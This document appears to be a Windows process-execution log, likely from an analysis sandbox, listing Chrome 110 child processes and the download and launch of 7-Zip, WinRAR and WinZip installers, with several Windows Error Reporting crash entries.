C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2228 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3056 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3064 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4336 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4468 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4628 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4656 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3156 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3232 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4392 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4612 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4960 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4984 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4428 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5172 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
C:\Users\Admin\Downloads\7z2405-x64.exe
"C:\Users\Admin\Downloads\7z2405-x64.exe"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0x80,0x108,0x7ffdd0dbab58,0x7ffdd0dbab68,0x7ffdd0dbab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1796 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1680 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3104 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3112 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3668 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4384 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4552 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4700 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4800 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4712 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4856 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4548 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4716 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4372 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4664 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f4 0x3b8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4864 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5508 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5852 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5476 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2752 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5624 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe"
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\386efc0b13014c9fa5fa915c94bab0c1 /t 1924 /p 3648
C:\Users\Admin\Downloads\winrar-x64-701.exe
"C:\Users\Admin\Downloads\winrar-x64-701.exe"
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\5e3ef59a3131498abf8e25a896e63c8d /t 2460 /p 3492
C:\Users\Admin\Downloads\winrar-x64-701.exe
"C:\Users\Admin\Downloads\winrar-x64-701.exe"
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\27594d8dceff427db694febdc1835c28 /t 3032 /p 5484
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xbc,0x108,0x7ffdd0dbab58,0x7ffdd0dbab68,0x7ffdd0dbab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1768 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2240 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3080 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3096 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4440 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4396 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4760 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4824 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4288 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3168 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3196 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3200 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4600 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5128 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5452 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3428 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5504 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Users\Admin\Downloads\winrar-x64-701 (1).exe
"C:\Users\Admin\Downloads\winrar-x64-701 (1).exe"
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\88b1fcd3ac4b4009ad93299c76555df4 /t 5968 /p 1536
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5588 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4324 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1204 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5576 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Users\Admin\Downloads\winrar-x32-701.exe
"C:\Users\Admin\Downloads\winrar-x32-701.exe"
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\d3092f89723b4e8296adabd22a598d1d /t 5112 /p 4276
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5676 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=5736 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5816 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5612 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=5188 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=2260 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=3428 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4724 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4732 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4712 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2412 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Users\Admin\Downloads\winzip28-lan.exe
"C:\Users\Admin\Downloads\winzip28-lan.exe"
C:\Users\Admin\AppData\Local\Temp\e5f39b6\winzip28-lan.exe
run=1 shortcut="C:\Users\Admin\Downloads\winzip28-lan.exe"
C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe
"C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe" /install
